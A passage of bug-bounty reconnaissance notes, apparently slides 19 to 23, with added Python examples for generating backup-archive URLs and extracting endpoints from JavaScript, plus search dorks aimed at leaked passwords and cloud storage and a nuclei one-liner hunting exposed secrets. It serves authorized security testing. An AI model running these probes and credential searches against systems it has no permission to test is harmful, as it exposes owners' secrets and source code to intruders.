  Tip: fuzz for "/wp-content/debug.log"; sometimes it contains SQL errors with query fragments that can be chained into a finding.
  • 19. FINDING SOURCE/BACKUP FILES
  Tool: https://github.com/musana/fuzzuli
  Credit: GodfatherOrwa
  Build the candidate archive names from the hostname's own labels plus a few generic words, and try each name at the web root and under a directory named after each candidate. For y0gi.hacklido.com:
  y0gi.hacklido.com/y0gi.zip - hacklido.zip - admin.zip - backup.zip
  y0gi.hacklido.com/y0gi/y0gi.zip - hacklido.zip - admin.zip - backup.zip
  y0gi.hacklido.com/hacklido/y0gi.zip - hacklido.zip - admin.zip - backup.zip
  y0gi.hacklido.com/admin/y0gi.zip - hacklido.zip - admin.zip - backup.zip
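  The grid above as a generator, an added example (not code from the slides and not fuzzuli's own code): the names come from the hostname's labels plus the generic words the slide uses ("admin", "backup"), and every name is tried at the root and under a directory named after each candidate. The extension list and the label skip-list are assumptions to tune per target.

```python
from itertools import product

# Added example (not from the slides, not fuzzuli): candidate URLs for the
# backup/source-archive pattern on slide 19. EXTENSIONS and SKIP_LABELS are
# assumptions; adjust them per target.

EXTENSIONS = (".zip", ".tar.gz", ".rar", ".7z", ".bak", ".sql")
STATIC_WORDS = ("admin", "backup")
SKIP_LABELS = {"www", "com", "net", "org", "io", "co", "uk"}


def candidate_names(host: str) -> list[str]:
    """Hostname labels (minus noise) followed by the static words, deduplicated in order."""
    names: list[str] = []
    for label in host.lower().split(".") + list(STATIC_WORDS):
        if label and label not in SKIP_LABELS and label not in names:
            names.append(label)
    return names


def backup_urls(host: str, scheme: str = "https",
                extensions: tuple[str, ...] = EXTENSIONS) -> list[str]:
    """Root-level and one-level-deep candidate archive URLs, root ones first."""
    names = candidate_names(host)
    directories = [""] + [f"{name}/" for name in names]
    return [f"{scheme}://{host}/{d}{name}{ext}"
            for d, name, ext in product(directories, names, extensions)]


if __name__ == "__main__":
    # Pipe into a prober, e.g.
    #   python3 backup_candidates.py > list.txt; httpx -l list.txt -mc 200 -cl -ct
    # A 200 with text/html is almost always a soft 404; a real archive comes
    # back as application/zip or application/octet-stream with a plausible size.
    for url in backup_urls("y0gi.hacklido.com"):
        print(url)
```

  For y0gi.hacklido.com this yields 120 URLs (5 locations x 4 names x 6 extensions); the count grows quickly with deeper hostnames, so trim the extension list before pointing it at a rate-limited target.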
  • 20. GOOGLE & GITHUB DORKING
  Trivial tricks. Find sensitive data in cloud storage:
  site:s3.amazonaws.com "target.com"
  site:blob.core.windows.net "target.com"
  site:googleapis.com "target.com"
  site:drive.google.com "target.com"
  GitHub leaks for AWS, Jira, Okta, etc.:
  org:"target" pwd/pass/passwd/password
  "target.atlassian" pwd/pass/passwd/password
  "target.okta" pwd/pass/passwd/password
  "jira.target" pwd/pass/passwd/password
  Also search Google Groups and GitLab.
  • 21. JAVASCRIPT [JS] FILES RECON
  Grep all URLs from wayback or gau.
  Collect all ".js" files.
  Filter by content type: httpx -content-type | grep -E 'application/javascript|text/javascript' (text/javascript is the current standard type, so match both).
  Run a Nuclei scan for exposures: nuclei -t /root/nuclei-templates/exposures/
  JS recon tip: collect all endpoints from the JS files and create a wordlist from them. Craft a POST request with any parameter and use that request to fuzz for sensitive directories.
  Tools: JSFScan, JSMiner (Burp extension), TruffleHog
  • 22. JAVASCRIPT [JS] FILES RECON
  Using Bambdas (Burp) for JS analysis.
  One-liner:
  echo targetdomain.com | gau | grep -E '\.js(\?|$)' | httpx -content-type | grep -E 'application/javascript|text/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt
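  The "collect endpoints from JS files and create a wordlist" step on slide 21, and the JS analysis slide 22 feeds, as an added example (not code from the slides, JSFScan or JSMiner): quoted strings that look like absolute paths or URLs are pulled out of a script, static assets and query strings are dropped, hostnames go back into subdomain enumeration, and the paths are split into directory prefixes for ffuf. The sample script is constructed for the example. The regexes are deliberately simple and miss endpoints built by concatenation or template literals, so treat the output as a starting wordlist, not a complete map.

```python
import re
from urllib.parse import urlsplit

# Added example (not from the slides, JSFScan or JSMiner): endpoint extraction
# from JavaScript and wordlist generation. SAMPLE_JS is constructed.

SAMPLE_JS = r'''
const API = "https://api.example.com/v2";
fetch(API + "/users/me");
axios.post('/api/v2/orders', body);
const img = "/static/img/logo.png";
loadScript("https://cdn.example.com/assets/app.js");
const exportUrl = "/internal/admin/export?format=csv";
'''

QUOTE = "[\"'`]"
PATH_RE = re.compile(QUOTE + r"(/[A-Za-z0-9_./?=&%-]*)" + QUOTE)
URL_RE = re.compile(QUOTE + r"(https?://[A-Za-z0-9_.:/?=&%#-]+)" + QUOTE)

# Static assets are noise for endpoint fuzzing; script URLs belong in the
# JS-collection step (slide 22), not in the endpoint list.
STATIC_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".css",
              ".woff", ".woff2", ".ico", ".js")


def extract_hosts(js: str) -> list[str]:
    """Hostnames referenced by absolute URLs; feed them back into subdomain enumeration."""
    hosts = {urlsplit(m.group(1)).hostname for m in URL_RE.finditer(js)}
    return sorted(h for h in hosts if h)


def extract_endpoints(js: str) -> list[str]:
    """Absolute paths referenced by the script, with query strings and static assets removed."""
    raw = {urlsplit(m.group(1)).path for m in URL_RE.finditer(js)}
    raw.update(m.group(1) for m in PATH_RE.finditer(js))
    paths = set()
    for p in raw:
        path = p.split("?", 1)[0]
        if not path or path == "/" or path.lower().endswith(STATIC_EXT):
            continue
        paths.add(path)
    return sorted(paths)


def build_wordlist(paths: list[str]) -> list[str]:
    """Every directory prefix of every path, without the leading slash, so ffuf
    can try them under other hosts and roots (-u https://host/FUZZ)."""
    words = set()
    for p in paths:
        segments = [s for s in p.split("/") if s]
        for i in range(1, len(segments) + 1):
            words.add("/".join(segments[:i]))
    return sorted(words)


if __name__ == "__main__":
    # Real use: read each downloaded .js file instead of SAMPLE_JS and merge the results.
    endpoints = extract_endpoints(SAMPLE_JS)
    print("hosts:", extract_hosts(SAMPLE_JS))
    print("endpoints:", endpoints)
    # Save the words to js-words.txt, then, as the slide suggests, fuzz with a POST:
    #   ffuf -u https://target.example/FUZZ -w js-words.txt -X POST -d "x=1" -mc 200,401,403
    print("\n".join(build_wordlist(endpoints)))
```

  Keep the hosts list separate from the paths list: a host found in JS (here cdn.example.com) is a lead for slide 4, while a path such as /internal/admin/export is a lead for slide 17, and a 401 or 403 on it is still worth recording.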
  • 23. Verify your data: some data is intended to be public, and there is no bug there.
  Reported > Invalid. Don't get angry; you may lose your bond with a good program.
  Yes, they do accept third party.
  Your crafting and exploits are gold: make the impact as high as you can.
  Be humble with the program; the money is going nowhere.
  Don't message the team constantly.